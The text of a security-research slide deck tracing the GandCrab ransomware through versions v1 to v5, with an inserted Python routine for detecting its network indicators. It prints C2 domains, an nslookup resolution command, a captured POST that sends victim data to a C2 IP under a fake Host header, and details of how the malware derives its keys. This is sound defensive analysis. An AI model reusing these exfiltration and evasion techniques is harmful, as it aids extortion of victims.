Slide 1
GANDCRAB MENTALITY
Jasper Manuel, Joie Salvio
Slide 2
GandCrab Ransomware-as-a-Service
Images by @CryptoInsane
Ransomware-as-a-Service (RaaS)
• Affiliate scheme 60-40 or 70-30
• Speed, reliability, customization
• Includes FUD, support, update
• Panel and Admin websites in TOR network
• Must not target members of Russian Commonwealth (AM, AZ, BY, RU, KZ, etc.)
Slide 3
Execution Flow (diagram steps)
• Encrypt Files
• Contact C2
• Delete Shadow Copies
• Generate Keys
• Terminate Processes
• Collect Victim Information
• Elevate Privilege
Slide 4
Ransom Note and Payment Page
Slide 5
GandCrab v1
• First to use only DASH ($200-$1200)
• .GDCB extension / GDCB-DECRYPT.txt
• .bit TLD for C2
• Uses RSA-2048/AES-CBC
C2 domains
• gandcrab.bit • bleepingcomputer.bit • nomoreransom.bit • esetnod32.bit • emsisoft.bit
C2 resolution: nslookup.exe <domain> a.dnspod.com
Vectors
• RIG Exploit Kit • GRANDSOFT Exploit Kit • SPAM
Internal Versions
• 1.0 • 1.1 • 2.1 • 2.1r • 2.2r • 2.3r • 2.3.1r
Slide 6
Encrypted File Structure (v1)
• Encrypted File Content
• AES Key Encrypted with RSA
Slide 7
GandCrab v1 Weaknesses
• Hard-coded RC4 key for victim info
Gathered Victim Info
Parameter   Description
action      always 'call'
ip          victim IP address
pc_user     username
pc_group    domain name the machine is under
pc_lang     locale (e.g. en-US)
pc-keyb     1=Russian, 0=non-Russian
os_major    Operating System (e.g. Windows 7 Ultimate)
os_bit      Operating System Architecture (e.g. x64, x86, ARM)
ransom_id   Roughly based on machine's root volume serial number
hdd         Information of all drives [<drive_letter>:_<drive_type>_<free_space>]
pub_key     RSA Public Key
priv_key    RSA Private Key
version     internal version hard-coded in the binary
Raw Victim Info: POST to http://<resolved-IP>/curl.php?token=<aff_id>, e.g. http://92.53.66.11/curl.php?token=1019
Slide 8
GandCrab v1 Weaknesses (code screenshots): the hard-coded RC4 key, and the routine that encrypts the victim data with RC4
Slide 9
GandCrab v1 Weaknesses
• CRYPT_VERIFYCONTEXT flag not set
The function that generates the RSA keys acquires its CSP context without the CRYPT_VERIFYCONTEXT flag, so the generated private key is stored locally in a persistent key container.
Slide 10
GandCrab v1 Decryptor Released
• Feb 28, Romanian Police released a decryption tool for v1
• 50,000 victims in a month
• $300k - $600k estimated payments
• Mostly US and UK
Slide 11
GandCrab v1 breach announcement
• Payment page was compromised
• GandCrab v2 will be released soon
• Fired the web developer
• “Fortified” their infrastructures
Slide 12
GandCrab v2
• .CRAB extension / CRAB-DECRYPT.txt
• Core payload is now a DLL
• Added Info parameters: id, subid
• Fake host header: bitdefender.com
C2 domains
• gdcb.bit • emsisoft.bit • gandcrab.bit • politiaromana.bit • malwarehunterteam.bit
Internal Versions
• 1.0.0r • kto_zaskrinit_tot_pidor • 1.2.0 • 1.2.1
Slide 13
GandCrab v2 victim-info POST (captured request; note the fake Host header):
POST /loey?lfeighss=oa&eas=fai HTTP/1.1
Host: bitdefender.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Length: 5880
Cache-Control: no-cache

EQp98lcg4tzXH5KsHq7sNWqdQ8tncHJCkQO62jrhXSiV7VRDI88eJ5G2658rSKgAyfPUtJlUyIk5AOI+jkGHhmGiDgiVUzJjZSJ1Xyko1hgjn5r9mohEAQrviJj7PPdgPrTO/yyJdgRxH/o09gsT+NZ3T9Ou8qFPRa+/pNA07skamoilCi/M/vzTbaDIOsOEzmMLaKRChA9VyLhBF6acBRUQRVRLTLiF+TPHPKrgLzVpasnQtEyzVWCa0ETM9CyQUsNsWL30q8eFanG5qw8WcgkTpMPfNyqF1Eo62dBj1lFVM4603G…
Slide 14
Pseudo-random RC4 Key (v2)
• Pseudo-random RC4 key to encrypt victim info
• The key is derived with CRC32 using a non-standard initial crc of 0x29a (666): from the pseudo-random string “fowge?eiplei=deoresc” and the constant “europol” the sample builds the RC4 key C10A57D3europol
• POST victim info to http://<resolved-IP>/<pseudo-random string>, e.g. http://92.53.66.11/fowge?eiplei=deoresc
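As an added example (not from the deck), the network indicators the slides describe for v1 and v2 turned into a small detection routine run over constructed log lines: .bit lookups against a.dnspod.com (slide 5), the v1 curl.php?token= check-in (slide 7) and a fake vendor Host header on a POST to a raw IP (this slide); the ahnlab.com and yahoo.com headers the deck lists for v2.1 and v3 are included in the same rule. The pipe-separated log format and the client names are assumptions made up for the example.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from the deck: the v1 check-in path, the fake Host headers used by
# v2 / v2.1 / v3, the .bit (Namecoin) C2 TLD and the resolver queried with nslookup.exe.
V1_CHECKIN = re.compile(r"^/curl\.php\?token=\d+$")
FAKE_HOSTS = {"bitdefender.com", "ahnlab.com", "yahoo.com"}
BIT_RESOLVER = "a.dnspod.com"
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample log lines (assumed pipe-separated format, not real telemetry):
#   dns|<client>|<query name>|<resolver>
#   http|<client>|<method>|<url>|<Host header>
SAMPLE_LOGS = """
dns|ws-01|gandcrab.bit|a.dnspod.com
dns|ws-01|www.microsoft.com|10.0.0.53
http|ws-01|POST|http://92.53.66.11/curl.php?token=1019|92.53.66.11
http|ws-02|POST|http://92.53.66.11/fowge?eiplei=deoresc|bitdefender.com
http|ws-03|GET|http://www.bitdefender.com/|www.bitdefender.com
"""

def check_dns(client, qname, resolver):
    """Flag any .bit lookup; ordinary resolvers cannot answer it, so the sample
    asked a.dnspod.com directly, which makes the match stronger."""
    if not qname.lower().endswith(".bit"):
        return None
    reason = "lookup of .bit C2 domain " + qname
    if resolver == BIT_RESOLVER:
        reason += " via " + BIT_RESOLVER
    return (client, reason)

def check_http(client, method, url, host_header):
    """Flag the v1 check-in path and the v2+ fake Host header; both only matter
    when the request goes to a raw IP (the resolved .bit address)."""
    parts = urlsplit(url)
    if not IPV4.match(parts.hostname or ""):
        return None  # a genuine visit to a vendor site is addressed by name, not by IP
    path = parts.path + ("?" + parts.query if parts.query else "")
    if method == "POST" and V1_CHECKIN.match(path):
        return (client, "GandCrab v1 victim-info POST to " + url)
    if host_header.lower() in FAKE_HOSTS:
        return (client, "Host header %s on request to raw IP %s" % (host_header, parts.hostname))
    return None

def scan(log_text):
    """Run both checks over the log text and return (client, reason) hits in order."""
    hits = []
    for line in log_text.strip().splitlines():
        kind, *fields = line.split("|")
        hit = check_dns(*fields) if kind == "dns" else check_http(*fields)
        if hit:
            hits.append(hit)
    return hits
```

Calling scan(SAMPLE_LOGS) returns three hits (the .bit lookup, the v1 check-in and the fake-Host POST) and ignores the two benign lines.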
Slide 15
Fixed CRYPT flag (v2): the function that generates the RSA keys now sets CRYPT_VERIFYCONTEXT
Slide 16
GandCrab v2.1
• Fake host header: ahnlab.com
C2 domains
• ransomware.bit • zonealarm.bit
Internal Versions
• 2.3.1 • 2.3.2 • 3.0.0
GandCrab 2.1 Ransom Note
Slide 17
GandCrab v3
• Changes wallpaper
• Fake host header: yahoo.com
• Adds autorun to HKLM for admin users
C2 domains
• carder.bit • ransomware.bit
Internal Versions
• 3.0.0 • 3.0.1
GandCrab Changes Wallpaper
Slide 18
GandCrab v3 Bug
• Unintentional “Lock Screen” on Windows 7 OS upon reboot
Slide 19
GandCrab v4
• Switches to RSA-Salsa20 encryption algorithm
• Encrypts offline
• Encrypts Network Shares
• Sandbox evasions (removed later)
• Anti-disassembly
• Removed wallpaper change
• Major code structure makeover
Internal Versions
• v4.0 • v4.1 • v4.1.1 • v4.1.2 • v4.1.3 • v4.1.2 (new variant) • v4.2 • v4.2.1 • v4.3 • v4.4
Victim data and key in ransom note
Slide 20
Encrypted File Structure (v4)
• Encrypted File Content
• Salsa20 Key Encrypted with RSA Public Key
Slide 21
Keys in the Ransom Note (v4)
• 32-byte Salsa20 Key
• RSA-2058 Private Key
• Also stored in: HKCU\Software\keys_data\data\private
Slide 22
Encrypted Keys (v4)
• RSA key pair (public and private) and a 32-byte Salsa20 key
• 32-byte Salsa20 Key, encrypted with RSA
• RSA-2058 Private Key, encrypted with Salsa20
Slide 23
GandCrab v4 Timeline (July to August)
Dates marked on the timeline: Jul 02, Jul 04, Jul 11, Jul 13, Jul 17, Jul 18, Jul 19, Jul 20, Aug 02, Aug 06
• v4.0: Salsa20/20 algorithm • Offline encryption • Encrypts network shares • Checks <8hex-chars>.lock
• v4.1: Sends victim data to a long list of URLs
• v4.1.1: No major changes
• v4.1.2: Uses Salsa20 to generate the .lock filename
• v4.1.3: No major changes
• v4.1.2 (new variant): GandCrab switches to mutex check
• v4.2: Update picked up from new 4.1.2 • Adds sandbox evasion tricks
• v4.2.1: Removes VM evasion function • Adds a link to POC of a Denial-of-Service attack on Ahnlab’s AV component
• v4.3: Adds anti-disassembly trick
• v4.4: Works as a vaccine by creating the ransomware mutex. Did not work on win7 at first
Ahnlab responses on the same timeline:
• Vaccine v1: Ahnlab releases a vaccine based on .lock filename
• Vaccine v2: Ahnlab releases a second version of the vaccine
Slide 24
GandCrab v5
• <5-10_random_char> extension
• Exploits used to elevate privilege: ALPC EOP Vulnerability (CVE-2018-8440), Win32k EOP Vulnerability (CVE-2018-8120)
• HTML ransom note, and added support for other languages
• Wallpaper feature (in some variants)
Internal Versions
• v5.0 • v5.0.1 • v5.0.2 • v5.0.3 • v5.0.4 • v5.0.5
Slide 25
GandCrab v5 Decryptor
• GandCrab released keys for Syrian victims
• Bitdefender released free decryptor for versions v1, v4, v5 (5.0.1-5.0.4)
• Decryptor does not work on v5.0.5, which appeared just a day later
Post of Syrian key release
Bitdefender releases free decryptor
Slide 26
Crypter partnership
• GandCrab partners with NTCrypt for a crypter service
• $100 (one-time stub), $350 (two stubs/week)
GandCrab announces “Crypt Competition”
NTCrypt wins the deal
Slide 27
Conclusion
The people behind GandCrab…
• Have good marketing skills to keep the trust of their affiliates and to build new partnerships.
• Try to compensate for their not-so-advanced malware with quick releases of new variants.
• Are very quick to react to solutions deployed against them.
• Are loud, crazy, and very confident in what they do.
Slide 28
C2 Visit Count (chart: visits per C2 domain, broken down by version v1, v2, v2.1, v3)
Domains plotted: ransomware.bit, politiaromana.bit, nomoreransom.bit, malwarehunter.bit, gdcb.bit, gandcrab.bit, esetnod32.bit, emsisoft.bit, bleepingcomputer.bit, carder.bit
Slide 29
Online Infection Map (chart: visit count, top 10)
Slide 30
Move to Asian Market
• GandCrab looking for partners in a Chinese underground forum
• VenusLocker campaign targeting South Korea
Slide 31
Sample Distribution (chart: Samples Received Per Month (2018), by version v1 to v5)
Slide 32
References
• https://securingtomorrow.mcafee.com/mcafee-labs/rapidly-evolving-ransomware-gandcrab-version-5-partners-with-crypter-service-for-obfuscation/
• https://research.checkpoint.com/gandcrab-ransomware-mindset/
• https://www.bleepingcomputer.com/news/security/gandcrab-devs-release-decryption-keys-for-syrian-victims/
• Special thanks to @MarceloRivero, @ValthekOn